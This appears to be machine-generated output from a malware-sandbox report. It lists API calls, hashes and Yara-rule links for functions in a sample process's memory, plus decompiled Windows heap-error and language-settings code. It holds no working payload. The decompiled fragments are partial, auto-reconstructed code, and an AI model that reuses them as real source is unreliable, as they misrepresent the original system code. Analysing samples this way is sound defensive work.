Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
Instruction ID: ee0aea943deee20d07fa146a45e34c543b93e6cbdaee80cd5ab31dba9409a02f
Opcode Fuzzy Hash: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
Instruction Fuzzy Hash: D2010CB5D4020DABDF10DBA5DD91F9DB3B9AF54208F004196A90897241FB31E754CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02AAA304

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: b4a7277d64a501dd25c35042b96f64df619e9a0d8a61a6d9afb1a18fe172a88c
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: F901AFB2210108ABCB54DF89DC90EEB77AEAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02AA8D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A9F020,?,?,00000000), ref: 02AA8DBC

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ad0d1b90a31a685206cd42dc80e69c47e59cbe2fd383be21bfc80b41b45fc321
Instruction ID: c3534d5c272b281b718d9ce00490c7064c3326f5a97bddc5d3ef7bdf1ae37e71
Opcode Fuzzy Hash: ad0d1b90a31a685206cd42dc80e69c47e59cbe2fd383be21bfc80b41b45fc321
Instruction Fuzzy Hash: 2DE06D733803043AE73065ADAC02FA7B29CCF91B21F55002AFA0DEB2C0DA95F40146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02AA4506,?,02AA4C7F,02AA4C7F,?,02AA4506,?,?,?,?,?,00000000,00000000,?), ref: 02AAA22D

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: e7f670eb8aff11b4e44894503da53d5e9b1f36b9dd05a8c4808cfb78ea8509ef
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 0AE046B1210208ABDB14EF99CC40EA777ADEF88750F118558FE085B242CA30F911CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02A9F1A2,02A9F1A2,?,00000000,?,?), ref: 02AAA3D0

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 4e1e68bb0c0e1c42cb2940b5d3ef9733b8d50087b320844b52b83ed8170f94cc
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E6E01AB12002086BDB10DF49CC84EE737ADEF88650F018154BA0857241CA30E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02A9F69C, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02A98CF4,?), ref: 02A9F6CB

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2bae81a478552899b8a03aeca82093466f6bb761d20cb985580fff344b34c71e
Instruction ID: 44b7a5a0c1b370ba73819fed09576218854a7f896c3cae59c4b1ece65a3b68d9
Opcode Fuzzy Hash: 2bae81a478552899b8a03aeca82093466f6bb761d20cb985580fff344b34c71e
Instruction Fuzzy Hash: 12D05E717D02003AEA10EAA49C46F6A32D65B59645F590064F64CEB2E3EA50D1014921

Uniqueness

Uniqueness Score: -1.00%

Function 02A9F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02A98CF4,?), ref: 02A9F6CB

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: e13cb5e267e906b3bb66bcb61f7851b6dd7a00b02126df2ef056307de2493af4
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: E2D05E716903043AEA10AAA59C02F6632C95B44A04F490064FA48D72C3EE50E0004565

Uniqueness

Uniqueness Score: -1.00%

Function 0491967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04919694

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c333180097a7d9681519a443ac560f4d7e58af081261468c063978d33822f941
Instruction ID: 6abeaf454631c6cff69b3126d9191c21bddd29ba8483a139d5484d054ceb4366
Opcode Fuzzy Hash: c333180097a7d9681519a443ac560f4d7e58af081261468c063978d33822f941
Instruction Fuzzy Hash: 8DB09BB19015D5C5F711D7605708717794477D0755F26C171D2020641E4778D091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0498B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0498B323
*** An Access Violation occurred in %ws:%s, xrefs: 0498B48F
a NULL pointer, xrefs: 0498B4E0
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0498B38F
Go determine why that thread has not released the critical section., xrefs: 0498B3C5
an invalid address, %p, xrefs: 0498B4CF
This failed because of error %Ix., xrefs: 0498B446
read from, xrefs: 0498B4AD, 0498B4B2
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0498B53F
*** Inpage error in %ws:%s, xrefs: 0498B418
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0498B47D
The instruction at %p referenced memory at %p., xrefs: 0498B432
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0498B305
write to, xrefs: 0498B4A6
The instruction at %p tried to %s , xrefs: 0498B4B6
<unknown>, xrefs: 0498B27E, 0498B2D1, 0498B350, 0498B399, 0498B417, 0498B48E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0498B3D6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0498B476
The resource is owned exclusively by thread %p, xrefs: 0498B374
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0498B314
*** Resource timeout (%p) in %ws:%s, xrefs: 0498B352
*** then kb to get the faulting stack, xrefs: 0498B51C
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0498B2F3
*** enter .exr %p for the exception record, xrefs: 0498B4F1
*** enter .cxr %p for the context, xrefs: 0498B50D
The critical section is owned by thread %p., xrefs: 0498B3B9
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0498B39B
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0498B2DC
The resource is owned shared by %d threads, xrefs: 0498B37E
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0498B484

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 5fe9bef420769b4a6766cbfeab4f6abd500b9561c607c939c8c631d0b3335426
Instruction ID: bcd20f4011b11fbb0adf12ae1b8928ffb6606edfc78c11eba0a94ebea17251c6
Opcode Fuzzy Hash: 5fe9bef420769b4a6766cbfeab4f6abd500b9561c607c939c8c631d0b3335426
Instruction Fuzzy Hash: 8E815671A01200FFEB217A18DC46D7B3B6AEF86765F09057CF5056B212E279F411EAB2

Uniqueness

Uniqueness Score: -1.00%

Function 04991C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04991C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x48b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E048DB150();
				} else {
					E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x49c589c);
				E048DB150("Heap error detected at %p (heap handle %p)\n",  *0x49c58a0);
				_t27 =  *0x49c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04991E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E048DB150();
				} else {
					E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E048DB150("Error code: %d - %s\n",  *0x49c5898);
				_t113 =  *0x49c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048DB150();
					} else {
						E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048DB150("Parameter1: %p\n",  *0x49c58a4);
				}
				_t115 =  *0x49c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048DB150();
					} else {
						E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048DB150("Parameter2: %p\n",  *0x49c58a8);
				}
				_t117 =  *0x49c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048DB150();
					} else {
						E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048DB150("Parameter3: %p\n",  *0x49c58ac);
				}
				_t119 =  *0x49c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E048DB150();
					} else {
						E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x49c58b4);
					E048DB150("Last known valid blocks: before - %p, after - %p\n",  *0x49c58b0);
				} else {
					_t120 =  *0x49c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E048DB150();
				} else {
					E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E048DB150("Stack trace available at %p\n", 0x49c58c0);
			}

0x04991c10
0x04991c16
0x04991c1e
0x04991c3d
0x04991c3e
0x04991c20
0x04991c35
0x04991c3a
0x04991c44
0x04991c55
0x04991c5a
0x04991c65
0x04991c67
0x00000000
0x04991c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04991c67
0x04991cdc
0x04991ce5
0x04991d04
0x04991d05
0x04991ce7
0x04991cfc
0x04991d01
0x04991d0b
0x04991d17
0x04991d1f
0x04991d25
0x04991d30
0x04991d4f
0x04991d50
0x04991d32
0x04991d47
0x04991d4c
0x04991d61
0x04991d67
0x04991d68
0x04991d6e
0x04991d79
0x04991d98
0x04991d99
0x04991d7b
0x04991d90
0x04991d95
0x04991daa
0x04991db0
0x04991db1
0x04991db7
0x04991dc2
0x04991de1
0x04991de2
0x04991dc4
0x04991dd9
0x04991dde
0x04991df3
0x04991df9
0x04991dfa
0x04991e00
0x04991e0a
0x04991e13
0x04991e32
0x04991e33
0x04991e15
0x04991e2a
0x04991e2f
0x04991e39
0x04991e4a
0x04991e02
0x04991e02
0x04991e08
0x00000000
0x00000000
0x04991e08
0x04991e5b
0x04991e7a
0x04991e7b
0x04991e5d
0x04991e72
0x04991e77
0x04991e95

Strings

heap_failure_multiple_entries_corruption, xrefs: 04991C8A
Last known valid blocks: before - %p, after - %p, xrefs: 04991E45
heap_failure_freelists_corruption, xrefs: 04991CC9
heap_failure_usage_after_free, xrefs: 04991CBB
heap_failure_generic, xrefs: 04991C7C
heap_failure_buffer_underrun, xrefs: 04991C9F
HEAP: , xrefs: 04991C16, 04991C3D, 04991D04, 04991D4F, 04991D98, 04991DE1, 04991E32, 04991E7A
heap_failure_lfh_bitmap_mismatch, xrefs: 04991CD7
HEAP[%wZ]: , xrefs: 04991C30, 04991CF7, 04991D42, 04991D8B, 04991DD4, 04991E25, 04991E6D
heap_failure_cross_heap_operation, xrefs: 04991CC2
heap_failure_invalid_argument, xrefs: 04991CAD
heap_failure_block_not_busy, xrefs: 04991CA6
heap_failure_entry_corruption, xrefs: 04991C83
Parameter3: %p, xrefs: 04991DEE
Error code: %d - %s, xrefs: 04991D12
heap_failure_listentry_corruption, xrefs: 04991CD0
Parameter1: %p, xrefs: 04991D5C
Stack trace available at %p, xrefs: 04991E86
heap_failure_buffer_overrun, xrefs: 04991C98
Parameter2: %p, xrefs: 04991DA5
heap_failure_unknown, xrefs: 04991C75
heap_failure_invalid_allocation_type, xrefs: 04991CB4
heap_failure_internal, xrefs: 04991C6E
heap_failure_virtual_block_corruption, xrefs: 04991C91
Heap error detected at %p (heap handle %p), xrefs: 04991C50

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 0be2c70d55535cd6f46b245de5a0bf68ff1c64966fbe3e8cfa02b1192b57f54b
Instruction ID: 88822a63437c0dea4ed22b5670005bd83045e1c4421cda52072707cedf47834c
Opcode Fuzzy Hash: 0be2c70d55535cd6f46b245de5a0bf68ff1c64966fbe3e8cfa02b1192b57f54b
Instruction Fuzzy Hash: 82618036615156DFFA119B8CD486E3073E5F708A31B0A8E7EF509EB705E678FC408A1A

Uniqueness

Uniqueness Score: -1.00%

Function 048E3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E048E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E048E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E048E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E048E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E048E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E048E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L048F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0491F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04921370(_t276, 0x48b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0491BB40(0,  &_v68, _t170);
									if(L048E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0491BB40(_t257,  &_v68, _t243);
								if(L048E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04921370(_t278, 0x48b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L048F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0491F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04921370(_v16, 0x48b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0491BB40(_t262,  &_v68, _t244);
								if(L048E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04921370(_t282, 0x48b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0491BB40(_t262,  &_v68, _t201);
							if(L048E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L048F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0491F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04921370(_t280, 0x48b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0491BB40(_t267,  &_v68, _t245);
							if(L048E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04921370(_t284, 0x48b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0491BB40(_t267,  &_v68, _t224);
						if(L048E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x048e3d3c
0x048e3d42
0x048e3d44
0x048e3d46
0x048e3d49
0x048e3d4c
0x048e3d4f
0x048e3d52
0x048e3d55
0x048e3d58
0x048e3d5b
0x048e3d5f
0x048e3d61
0x048e3d66
0x04938213
0x04938218
0x048e4085
0x048e4088
0x048e408e
0x048e4094
0x048e409a
0x048e40a0
0x048e40a6
0x048e40a9
0x048e40af
0x048e40b6
0x048e40bd
0x048e40bd
0x048e3d83
0x0493821f
0x04938229
0x04938238
0x04938238
0x0493823d
0x0493823d
0x048e3da0
0x048e3daf
0x048e3db5
0x048e3dba
0x048e3dba
0x048e3dd4
0x048e3e94
0x048e3eab
0x048e3f6d
0x048e3f84
0x048e406b
0x048e406b
0x048e406e
0x048e406e
0x048e4070
0x048e4074
0x04938351
0x04938351
0x048e407a
0x048e407f
0x0493835d
0x04938370
0x04938377
0x04938379
0x0493837c
0x0493837c
0x0493835d
0x00000000
0x048e407f
0x048e3f8a
0x048e3f8d
0x048e3f90
0x048e3f95
0x0493830d
0x0493830f
0x048e3f9b
0x048e3fac
0x048e3fae
0x048e3fb1
0x048e3fb1
0x048e3fb6
0x04938317
0x0493831a
0x00000000
0x048e3fbc
0x048e3fc1
0x048e3fc9
0x048e3fd7
0x048e3fda
0x048e3fdd
0x048e4021
0x048e4021
0x048e4029
0x048e4030
0x048e4044
0x048e4046
0x048e4046
0x048e4044
0x048e4049
0x04938327
0x04938334
0x04938339
0x0493833c
0x048e404f
0x048e404f
0x048e404f
0x048e4051
0x048e4056
0x048e4063
0x048e4063
0x048e4068
0x00000000
0x048e4068
0x048e3fdf
0x048e3fe2
0x048e3fe4
0x048e3fe7
0x048e3fef
0x048e4003
0x048e4005
0x048e4005
0x048e400c
0x048e4013
0x048e4016
0x048e4017
0x048e401b
0x048e401e
0x00000000
0x048e401e
0x048e3fb6
0x048e3eb1
0x048e3eb4
0x048e3eb7
0x048e3ebc
0x049382a9
0x049382ab
0x048e3ec2
0x048e3ed3
0x048e3ed5
0x048e3ed8
0x048e3ed8
0x048e3edd
0x049382b3
0x049382b6
0x00000000
0x048e3ee3
0x048e3ee8
0x048e3eed
0x048e3ef0
0x048e3ef3
0x048e3f02
0x048e3f05
0x048e3f08
0x049382c0
0x049382c3
0x049382c5
0x049382c8
0x049382d0
0x049382e4
0x049382e6
0x049382e6
0x049382ed
0x049382f4
0x049382f7
0x049382f8
0x049382fc
0x049382ff
0x049382ff
0x048e3f0e
0x048e3f11
0x048e3f16
0x048e3f1d
0x048e3f31
0x04938307
0x04938307
0x048e3f31
0x048e3f39
0x048e3f48
0x048e3f4d
0x048e3f50
0x048e3f50
0x048e3f53
0x048e3f58
0x048e3f65
0x048e3f65
0x048e3f6a
0x00000000
0x048e3f6a
0x048e3edd
0x048e3dda
0x048e3ddd
0x048e3de0
0x048e3de5
0x04938245
0x048e3deb
0x048e3df7
0x048e3dfc
